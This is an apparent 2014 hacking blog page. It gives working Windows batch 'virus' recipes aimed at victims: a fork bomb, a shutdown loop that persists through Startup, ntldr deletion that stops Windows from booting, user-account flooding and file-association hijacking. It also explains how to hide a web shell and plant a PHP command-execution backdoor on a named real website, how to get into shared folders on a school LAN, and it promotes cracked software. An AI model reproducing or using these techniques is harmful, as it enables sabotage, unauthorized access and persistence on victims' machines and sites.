image05 image06 image07

300x250 AD TOP

.

Feature Label Area

Saturday 19 April 2014

Tagged under:

Deadly Bat File Viruses-Create And Encrypt




****DEADLY BAT FILE VIRUSES----HOW TO CREATE AND ENCRYPT ????????  ****


NOTE: Educational Purpose only
Open notepad, type the following lines, select all files under save and give extension with anyname.bat

1. Application Bomber
@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.


2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating windows user accounts whose names could be any random numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds
Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply
Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will not reboot and a normal victim would definitely install the windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage zero
This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.
Thankyou and share with your friends 

Thursday 17 April 2014

Tagged under:

How To Patch Websites Having Sql,Xss&Lfi Vulnerabilities????

HOW TO PATCH WEBSITES FROM SQL ,LFI,XSS VULNERABILITIES???


check this out :) :)

SQL injection is a code injection technique, used to attack data driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered forstring literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

                                        Patch sql injection vulnerability using this video :) :)


Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pagesviewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser. This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.

Patch XSS,LFI based vulnerabilities using this video :) :) 



                                    Not just making websites matter...making secure websites matters :)





Wednesday 16 April 2014

Tagged under:

Hiding Your Shell And Maintaining Access To Your Defaced Website

HIDING YOUR SHELL AND MAINTAINING ACCESS TO YOUR SHELL/HACKED WEBSITE

How can we hide a shell???

suppose 404.php is your shell when you want to hide it just make it as .404.php and upload it :)

shell will be hidden !!!

check out this here you cannot see 404.php because it is hidden as .404.php

but now check dis out :) give .404.php shell gets executed give ur created password and you are into shell !!




here you are into shell :)


now how to maintain access to your shell or your hacked site??

here is the php script

<?php
$url = $_GET['id'];
system($url);
?>


you can either inject in config file nt directly viewed by browser or make it as a file like maintain.php and upload it on shell now im uploading maintain.php into it



now you can execute system commands through your maintain.php backdoor as

                             http://www.ifuture.org.pk/ijest/scripts/maintain.php?id=ls


ls will list all the  directories as you can see it listed all the directories in this way you can keep a backdoor to your shell :)

Tuesday 15 April 2014

Tagged under:

Download Torrentz Files Using IDM

HOW TO DOWNLOAD TORRENTZ FILES USING INTERNET DOWNLOAD MANAGER AND DOWNLOADING YOUTUBE VIDEOS MADE EASY 


Hello every one today im going to explain u hw 2 download youtube videos and torrentz
through idm-internet download manager here you go first i start with torrentz

1.Go to torrentz.eu or kat.ph i am using kat.ph and select a file you want to download



2. now i selected a random file



3.now click on magnet link---rightclick---copylinkaddress



                                                  now i have copied my magnet link

4.now go to http://www.zbigz.com paste your magnet link---click on go



Then choose free account


it will get cached for some time...then download option comes :)




click on zip file--then give free account--then automatically download gets started...better use idm for this :)


GET BEST IDM CRACKED 7.1 VERSION FROM HERE :)


NOTE: only files less than 1 gb of data can only be downloaded from zbigz..

if u need to download more than that ill give u a solution



now if files r more than 1 gb

?????

there are online forums in facebook paste your magnet link there they will generate uptobox/zbigz premium links and provide u  let me give u that blog---it z just osmmmm blog




here you can post your magnet link and they will reply u with in 10 min :)


NOW LETS COME TO YOUTUBE

open a youtube video jus remove https://www.   to ss

suppose this my link


 make it as ssyoutube.com/watch?v=7TJ6DGhZQ-k ---copy this and paste in browser

you can download youtube videos with your preferred clarity 720p,1080p,360p wateva :) :)


Tagged under:

Lan Hacking

Lan Hacking 

Hey friends today I am going to teach you how to hack your school/college LAN without using any tool. 
YES, you read it correctly "without using a single tool", using only windows command.

All you need is Luck and Patience. Six simple process then we are done.


1. arp -a 


This will list the active systems in you LAN, from which you choose a victim,
in my case I choose 10.1.0.73 (after trying more than five victims without +ve result)

2. Next use "nbtstat -A 10.1.0.73"


This will give you the netbios name , on the table if you see <20> it means shared is enable,
next you use "net view" to see the list of share documents on the victim system,
if <20> is not there choose another victim.

3. Next use "net view 10.1.0.73"


If no shared floder is listed then choose another victim.
If you get "Access is denied" find another victim.
Now use “ net use “ with any of the shared name and change 
to the dir letter in this case G:

4. net use G: \\10.1.0.73\SharedDocs

5. G: <enter key>

6. Start --> My computer --> Network Locations 

Thatz it.....Enjoy hacking


BY: https://www.facebook.com/justin.philip2  -justinhaxor :) :)